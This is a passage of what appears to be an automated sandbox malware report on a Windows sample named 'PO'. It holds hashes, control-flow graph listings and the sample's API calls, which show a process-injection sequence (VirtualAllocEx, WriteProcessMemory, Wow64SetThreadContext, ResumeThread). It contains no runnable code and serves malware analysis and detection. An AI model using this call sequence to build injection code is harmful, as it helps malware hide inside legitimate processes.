                        • Opcode Fuzzy Hash: fa51e22a4112e7eb30ab11370c671dc4634fc8474325bbb5d42cafa07a4e917a
                        • Instruction Fuzzy Hash: 17915DB1D0021ACFDB10DF68C990BDEBBB2BF49314F14856AE859A7240DB749985CFA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1153 171b360-171b37f 1154 171b381-171b38e call 1719d78 1153->1154 1155 171b3ab-171b3af 1153->1155 1162 171b390 1154->1162 1163 171b3a4 1154->1163 1156 171b3b1-171b3bb 1155->1156 1157 171b3c3-171b404 1155->1157 1156->1157 1164 171b411-171b41f 1157->1164 1165 171b406-171b40e 1157->1165 1210 171b396 call 171b5f8 1162->1210 1211 171b396 call 171b608 1162->1211 1163->1155 1166 171b421-171b426 1164->1166 1167 171b443-171b445 1164->1167 1165->1164 1170 171b431 1166->1170 1171 171b428-171b42f call 171ad9c 1166->1171 1169 171b448-171b44f 1167->1169 1168 171b39c-171b39e 1168->1163 1172 171b4e0-171b55d 1168->1172 1173 171b451-171b459 1169->1173 1174 171b45c-171b463 1169->1174 1176 171b433-171b441 1170->1176 1171->1176 1203 171b5bd-171b5d3 GetModuleHandleW 1172->1203 1204 171b55f-171b5a0 1172->1204 1173->1174 1177 171b470-171b479 call 171adac 1174->1177 1178 171b465-171b46d 1174->1178 1176->1169 1184 171b486-171b48b 1177->1184 1185 171b47b-171b483 1177->1185 1178->1177 1186 171b4a9-171b4b6 1184->1186 1187 171b48d-171b494 1184->1187 1185->1184 1193 171b4d9-171b4df 1186->1193 1194 171b4b8-171b4d6 1186->1194 1187->1186 1189 171b496-171b4a6 call 171adbc call 171adcc 1187->1189 1189->1186 1194->1193 1207 171b5d5-171b5db 1203->1207 1208 171b5dc-171b5f0 1203->1208 1205 171b5a2-171b5a5 1204->1205 1206 171b5a8-171b5bb 1204->1206 1205->1206 1206->1203 1207->1208 1210->1168 1211->1168
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 0171B5C6
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_1710000_PO.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: c3293e308be4e01b4566ece02dff3640498d5418aa08f96f3fc05b8972f067e7
                        • Instruction ID: 2a18048642b1b0e02ea4c2da27fb0e696463cbe468012657ef6374708fc75ada
                        • Opcode Fuzzy Hash: c3293e308be4e01b4566ece02dff3640498d5418aa08f96f3fc05b8972f067e7
                        • Instruction Fuzzy Hash: B28134B0A00B058FD764DF6DD44476ABBF1FF88204F10892ED88ADBA54DB75E949CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1320 171ade0-171ade9 1322 171ae49 1320->1322 1323 171adeb-171adff 1320->1323 1325 171aea6 1322->1325 1326 171ae4b-171ae58 1322->1326 1324 171b7c8-171b808 1323->1324 1328 171b810-171b83f LoadLibraryExW 1324->1328 1329 171b80a-171b80d 1324->1329 1330 171aed1-171aedc 1325->1330 1331 171ae0a-171ae0b 1326->1331 1332 171ae5a-171ae5b 1326->1332 1333 171b841-171b847 1328->1333 1334 171b848-171b865 1328->1334 1329->1328 1330->1324 1331->1322 1332->1330 1333->1334
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0171B641,00000800,00000000,00000000), ref: 0171B832
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_1710000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: fb3cfe3e3cb0fd0a3e3515ce55c80df32dbe7743bfbba49c6cc7342b1dd0fee3
                        • Instruction ID: a58b4dd03c697d33b8234ad984abc2ca0190850d58e96006f8103874be92d317
                        • Opcode Fuzzy Hash: fb3cfe3e3cb0fd0a3e3515ce55c80df32dbe7743bfbba49c6cc7342b1dd0fee3
                        • Instruction Fuzzy Hash: 81318BB2C093898FDB11CFAEC845AAAFFF4EF99310F48809ED555A7215C3749509CBA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1338 74dc4e8-74dc53e 1341 74dc54e-74dc58d WriteProcessMemory 1338->1341 1342 74dc540-74dc54c 1338->1342 1344 74dc58f-74dc595 1341->1344 1345 74dc596-74dc5c6 1341->1345 1342->1341 1344->1345
                        APIs
                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074DC580
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 1a59047cb11b2453fc6e0d7db34947ed2af10c225b1cbdc8cb88a384039daab2
                        • Instruction ID: 6d7724c51d7ec53a40911dffe018a069af76118941c14fc495e05dd79405dcf6
                        • Opcode Fuzzy Hash: 1a59047cb11b2453fc6e0d7db34947ed2af10c225b1cbdc8cb88a384039daab2
                        • Instruction Fuzzy Hash: 0F215AB19003199FCB10DFA9C881BEEBBF5FF48310F10842AE959A7240C7789944DBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1349 74dc4f0-74dc53e 1351 74dc54e-74dc58d WriteProcessMemory 1349->1351 1352 74dc540-74dc54c 1349->1352 1354 74dc58f-74dc595 1351->1354 1355 74dc596-74dc5c6 1351->1355 1352->1351 1354->1355
                        APIs
                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074DC580
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 13858ee57a7a11eede6d87778a7e2d0d249356373ac2a737a4f1630457ccf8cf
                        • Instruction ID: ec9c3c8de7cc365593fe532cb55a2a599a98c517e7b2ce3ee3c002557c12fd1a
                        • Opcode Fuzzy Hash: 13858ee57a7a11eede6d87778a7e2d0d249356373ac2a737a4f1630457ccf8cf
                        • Instruction Fuzzy Hash: FB2139B59003599FCB10CFA9C885BEEBBF5FF48310F10842AE959A7240C7789944DBA4
                        APIs
                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074DC660
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 49d7efd13e10807bf2ac7fb548153d336135726e951421fe5d88ddb240c7f786
                        • Instruction ID: 052dc8d5a42b6deb048ec6c1d261a69d02f8a8c8c80a6a41a2d5b8c25d3fb846
                        • Opcode Fuzzy Hash: 49d7efd13e10807bf2ac7fb548153d336135726e951421fe5d88ddb240c7f786
                        • Instruction Fuzzy Hash: C32128B1D003599FCB10DFAAC881AEEFBF5FF48320F14842AE559A7240D7349944DBA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1359 74dbae0-74dbb33 1362 74dbb35-74dbb41 1359->1362 1363 74dbb43-74dbb73 Wow64SetThreadContext 1359->1363 1362->1363 1365 74dbb7c-74dbbac 1363->1365 1366 74dbb75-74dbb7b 1363->1366 1366->1365
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074DBB66
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: d3efe4bbed3567a6f30f3c65ebf0e4ec89e34e069c0e351b3d922266abc371f9
                        • Instruction ID: 3d6bb8faf6d9fe978fb994f253aff59313b07c00f8cdffce32fe25492d0edd16
                        • Opcode Fuzzy Hash: d3efe4bbed3567a6f30f3c65ebf0e4ec89e34e069c0e351b3d922266abc371f9
                        • Instruction Fuzzy Hash: 94216AB1D003099FDB10DFAAC885BEEBBF4EF48320F14842AD559A7241CB789944CFA4
                        APIs
                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074DC660
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 90bcb04d74e1e4db7740ca0962f609a7883ddd920f77829bb039bc84830a496f
                        • Instruction ID: 348d39c09017f3f2d71cc6fb39ad1cc9f5a5802482f3c347b89f33c196da6df6
                        • Opcode Fuzzy Hash: 90bcb04d74e1e4db7740ca0962f609a7883ddd920f77829bb039bc84830a496f
                        • Instruction Fuzzy Hash: 03213AB1C003599FCB10DFAAC880AEEFBF5FF48320F10842AE559A7240C7349944DBA4
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074DBB66
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: d777fb9fb20f14780da3c21913e7409f3fe7d0577f874643ef30c2cb7e630c4e
                        • Instruction ID: 58f3ace92a47135ab25b11d95522363ae41ead84c7af975ad73625d7869acca5
                        • Opcode Fuzzy Hash: d777fb9fb20f14780da3c21913e7409f3fe7d0577f874643ef30c2cb7e630c4e
                        • Instruction Fuzzy Hash: 28212CB1D003099FDB10DFAAC985BEEBBF4EF48324F14842AD559A7241DB789944CFA4
                        APIs
                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074DC49E
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: d599054552e6bc109d20951ca33857a8cc0f8c11e03efca6c105da6322f095d7
                        • Instruction ID: 96fcd571f569a62311460f034244acf9a312894381e582167e2a783ad8aaf625
                        • Opcode Fuzzy Hash: d599054552e6bc109d20951ca33857a8cc0f8c11e03efca6c105da6322f095d7
                        • Instruction Fuzzy Hash: 65117CB29002499FCB10DFA9C845BEFBFF5EF88324F14841AE515A7250C7359940CFA0
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0171B641,00000800,00000000,00000000), ref: 0171B832
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_1710000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 037195ccb37743ba8f40083bc274d918fbb187639bbf0a056db03b2a90209a56
                        • Instruction ID: 7c242ab98f5ccc5135f1ad53d9c18a1dc18c549a8cded2a3fb230d8ea90e54b8
                        • Opcode Fuzzy Hash: 037195ccb37743ba8f40083bc274d918fbb187639bbf0a056db03b2a90209a56
                        • Instruction Fuzzy Hash: 0411D3B69042499FDB10CF9AD844A9EFBF4EB88720F14846ED919A7200C375A945CFA5
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0171B641,00000800,00000000,00000000), ref: 0171B832
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_1710000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 64e189ca689d6489e9a3342cb5828b0b3aa24f364c4d89c72a1c48483061c5ae
                        • Instruction ID: 95bbec45dfaebdf03f6bfaac0eff2d3dbaf2acc99b56106101990ed45828d4b9
                        • Opcode Fuzzy Hash: 64e189ca689d6489e9a3342cb5828b0b3aa24f364c4d89c72a1c48483061c5ae
                        • Instruction Fuzzy Hash: 3D1114B6C003498FDB10CF9AD844ADEFBF5EB88310F14842AD919A7200C375A945CFA4
                        APIs
                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074DC49E
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: f0f36189adcc1ed598712fd93a9d1e3452104a8084545940efd764fbb070aae1
                        • Instruction ID: 211108aab7105bdbfb3b2312ee0faadd20fea7b7e9f2626a84602e152583c8b6
                        • Opcode Fuzzy Hash: f0f36189adcc1ed598712fd93a9d1e3452104a8084545940efd764fbb070aae1
                        • Instruction Fuzzy Hash: 6C1149769002499FCB10DFAAC844AEFBFF5EF88324F14841AE559A7250CB759944DFA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 54af3c588a33f5709a780d157da5532b493e853d02b5b83aa3bf095b8c587949
                        • Instruction ID: 59c5b5fb4a4ec488c0825ef6a82a6eafc56442f57390b16502e1e057dc4206a6
                        • Opcode Fuzzy Hash: 54af3c588a33f5709a780d157da5532b493e853d02b5b83aa3bf095b8c587949
                        • Instruction Fuzzy Hash: 5E112BB1D002498FDB20DFAAC9457EEFBF5EB88324F14841AD559A7340CB756944CB94
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: f8b4aa477e2813223c00a4ecaedb48c0b27519643ae361912af4f5c94f9e8b9d
                        • Instruction ID: 4f25d688c2a2e153c2f50306284bd9b2a16198ce2f1aeb57d83f96f0ff9fb5d0
                        • Opcode Fuzzy Hash: f8b4aa477e2813223c00a4ecaedb48c0b27519643ae361912af4f5c94f9e8b9d
                        • Instruction Fuzzy Hash: 5E1128B19002498BDB20DFAAC8457EEFBF5EB88324F14841AD559A7240CB756944CBA4
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 0171B5C6
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_1710000_PO.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 5d07c599007a7de9108c02ab2b73ee2bbe88bf88a17d06ff9acc7c8cde02dae3
                        • Instruction ID: 5694e48f69f1aab3dc2ce48f373dcd97036957e57f5be294542caa7ed521b7d5
                        • Opcode Fuzzy Hash: 5d07c599007a7de9108c02ab2b73ee2bbe88bf88a17d06ff9acc7c8cde02dae3
                        • Instruction Fuzzy Hash: 2E110FB6C002498FDB10CF9AD844A9EFBF8EB88320F20842AD529B7600C375A545CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: (
                        • API String ID: 0-3887548279
                        • Opcode ID: 0ebaeb4850ffccedc46a0b5765025bfaa495b7b3a71599ccbd39c7a2d128f910
                        • Instruction ID: d1002de406903719f51e561055e319caa680ffc8972d13af4a82d68e91568582
                        • Opcode Fuzzy Hash: 0ebaeb4850ffccedc46a0b5765025bfaa495b7b3a71599ccbd39c7a2d128f910
                        • Instruction Fuzzy Hash: 7001C93590A268DFEB20CB64CD44BEDBBB8FB0A315F1491D9D409A3252C3359E86CF50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30d49d99eca08865b2511d137c2a8c01c2703d9b6c36fd7ce78c1cdb5f85d8cd
                        • Instruction ID: 2b8d958c80d3214a3a05233399c773faea6d0f6c8b7652e12dbbfc621e986c80
                        • Opcode Fuzzy Hash: 30d49d99eca08865b2511d137c2a8c01c2703d9b6c36fd7ce78c1cdb5f85d8cd
                        • Instruction Fuzzy Hash: 24412874D08268DFDB61CF64C890BE8BBB5BB4A300F0081EAD099A7691DB745EC5CF50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_154d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 479543aed46f89bf2f422c9fe8ed063510e1425a92c3980c537b4ab2868ec6fe
                        • Instruction ID: 0e537441b9925b653b3957441e84fc13c3710699e036776f57e69e7658c26993
                        • Opcode Fuzzy Hash: 479543aed46f89bf2f422c9fe8ed063510e1425a92c3980c537b4ab2868ec6fe
                        • Instruction Fuzzy Hash: 07213672104200DFCB16DF98C9C4B2ABFB5FB98318F248568ED091F246C33AD416CBA1
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_155d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07bb12886bedd169d1dd8566cc786916f531c5d56077281e839b1fbf72a11d7a
                        • Instruction ID: fbf6f4a3e83bcb789a66d981fe4905b51fe5bd5c7d7e2eea84b8278bbcfe8bac
                        • Opcode Fuzzy Hash: 07bb12886bedd169d1dd8566cc786916f531c5d56077281e839b1fbf72a11d7a
                        • Instruction Fuzzy Hash: 67210376504200DFDB55DF58D990B2ABBB5FB84324F20C96EDC094F266D33AD407CA61
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_155d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 283e4e78ecf6c01ed93b2f92160b5456b88b3ae8d138117d32476d547b3b544f
                        • Instruction ID: 15e1f13456fcb75ab961357dfad09d709dd0088d786e40402613c2a3a4def06d
                        • Opcode Fuzzy Hash: 283e4e78ecf6c01ed93b2f92160b5456b88b3ae8d138117d32476d547b3b544f
                        • Instruction Fuzzy Hash: B121D372604200DFDB45DF98D594B2ABBB5FB84324F24C96EDC094F257C33AD406CA61
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 377d49ebcbfbf6fe94b6e655a8977507c5ad05bef82461e94d417a1ca77c76ed
                        • Instruction ID: 64e49a6f93e8adb224d961df7002241962080e09733b73cc86c5be23bb206a63
                        • Opcode Fuzzy Hash: 377d49ebcbfbf6fe94b6e655a8977507c5ad05bef82461e94d417a1ca77c76ed
                        • Instruction Fuzzy Hash: 5321E675D4922ADEEB34CF65D8443E9F6B5BF8A311F00A5A6D409A2111E7704ECACF50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_155d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c95c66f02616327e813a77a26e5ba638c529f34ff5fd71537826daf5be79e141
                        • Instruction ID: 39aa39f7defaa2991a2b7f04b06ea8f6fde60019c98cfaa34be93aa9f7210671
                        • Opcode Fuzzy Hash: c95c66f02616327e813a77a26e5ba638c529f34ff5fd71537826daf5be79e141
                        • Instruction Fuzzy Hash: 6B2171755083849FDB03CF64D994715BF71FB46214F28C5DAD8498F2A7D33A9806CB62
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a1df4e86407f2744e88fea973c5dc7f5c54d68157690f3ae17af40ed405b30fa
                        • Instruction ID: 2ae0352c387f5389f7098522caacc68e4f42b9e2c3869b8ee5cba2f7dc10755e
                        • Opcode Fuzzy Hash: a1df4e86407f2744e88fea973c5dc7f5c54d68157690f3ae17af40ed405b30fa
                        • Instruction Fuzzy Hash: A421C538E08228DFDB64CF54C884BEDBBB9BB49311F109099D40EA7256D7355E86CF50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_154d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                        • Instruction ID: 1e210707e8439199799c5928b4344f23c14a74a0772dbe65daad51b6a011ed94
                        • Opcode Fuzzy Hash: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                        • Instruction Fuzzy Hash: 2A21AC76504280DFDB06CF44D9C4B1ABF72FB98318F2482A9DD491A256C33AD426CB91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb706422ea0bdf01958f6ef499bd62c0df19cd7e67e0ee345376810a90f73d8d
                        • Instruction ID: 72d11f2ca83069fabf57ae311f71548f707e17c1bf0094b9c41e72671b0f5ffb
                        • Opcode Fuzzy Hash: fb706422ea0bdf01958f6ef499bd62c0df19cd7e67e0ee345376810a90f73d8d
                        • Instruction Fuzzy Hash: 8901C831E08120BBF7209A55CC50A36B7A9FBC5642BD8C62B9C179B744C922D80A8B91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_155d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                        • Instruction ID: 3f4754fb0a7951fef35c3bf869f704f291000e72490761713a25d894ca3e1a48
                        • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                        • Instruction Fuzzy Hash: 4811A976504280DFDB06CF64D594B19BBB2FB84314F24C6AADC094F657C33AD40ACB61
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f8cd73670c0b7397db14658d403507b7c3ef4416fdef25cc543c221ba601ca6
                        • Instruction ID: 65743b1ac2706d85a660def7d2e18143483b909eab8c663b872a8a6cb5415ff1
                        • Opcode Fuzzy Hash: 8f8cd73670c0b7397db14658d403507b7c3ef4416fdef25cc543c221ba601ca6
                        • Instruction Fuzzy Hash: 2101DD31F08134FBB7249959CC50977B7AAFBC56427D4C62B9C1797744CA329C0ACB51
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_154d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: faa7fbaac91d2bacafdef57fb32d8804bcfeb9d59a6171609ac066f1d905d102
                        • Instruction ID: bac3b230e473fb413f89c4ebb9bd169dca384afc5aaf3d7d09e7ba2baa0a5bf5
                        • Opcode Fuzzy Hash: faa7fbaac91d2bacafdef57fb32d8804bcfeb9d59a6171609ac066f1d905d102
                        • Instruction Fuzzy Hash: 5601A7714053449BF7118A99CD84776FFE8FFA1338F18C45AED0D0E286D6759840CAB1
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cf12ba551ec3a85427e2f4b55c249cc021735b6abface538ae3284c3b769ec9
                        • Instruction ID: 2edc7740c4c0e5f1a8032cdbb7a560867f08b30b766393fbe2a79f725f7af60d
                        • Opcode Fuzzy Hash: 0cf12ba551ec3a85427e2f4b55c249cc021735b6abface538ae3284c3b769ec9
                        • Instruction Fuzzy Hash: 3911A278E082689FDB65CF99DC90ADDBBB5BF49300F1480A9D40DAB255D7305D46CF40
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a79d2e2ffcfab5829f359f1b6f213020c3c89235535795ebe8e0c4eb4aab71c
                        • Instruction ID: 8052a0a1595dca5ede926f3ac49b4cbfcd5d2b3e28ec7609fa62af04cb3c37b6
                        • Opcode Fuzzy Hash: 7a79d2e2ffcfab5829f359f1b6f213020c3c89235535795ebe8e0c4eb4aab71c
                        • Instruction Fuzzy Hash: 38019278E08228DFDB64CF95D880ADDBBB6BB48700F109099D50EAB255D7305E46CF40
                        Memory Dump Source
                        • Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_154d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62f1b29ec8cb147adb4e381733fd0be0b8d2f4ccadd68d4a0f9e6d3263c7e85a
                        • Instruction ID: e12406201b1d457a584e1dee0cf1446c70aea17a76691265b97fb9df1afe13f0
                        • Opcode Fuzzy Hash: 62f1b29ec8cb147adb4e381733fd0be0b8d2f4ccadd68d4a0f9e6d3263c7e85a
                        • Instruction Fuzzy Hash: 6AF06272404344ABF7118A59CD84B76FFE8EB91634F18C45AED4C5E286C3799844DA71
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
